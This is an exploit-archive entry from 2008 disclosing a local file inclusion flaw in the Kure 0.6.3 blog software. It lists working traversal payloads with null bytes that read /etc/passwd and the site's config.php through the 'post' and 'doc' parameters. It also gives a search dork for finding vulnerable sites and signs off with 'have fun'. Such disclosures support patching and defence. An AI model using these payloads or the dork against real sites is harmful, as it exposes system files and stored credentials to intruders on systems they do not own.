id: 3904
date: 10/15/2008
title: Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
author: JosS
cves: 

==================================================================
Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
==================================================================


# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
# url: http://code.google.com/p/kure/downloads/list
#
# Author: JosS
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off

LFI /etc/passwd:
/?post=../../../../../../../../../../../../../etc/passwd%00
/?doc=../../../../../../../../../../../../../etc/passwd%00

LFI /config.php:
/?post=../config.php%00
/?doc=../config.php%00

dork: "powered by kure"

have fun :D



#  0day.today [2023-03-25]  #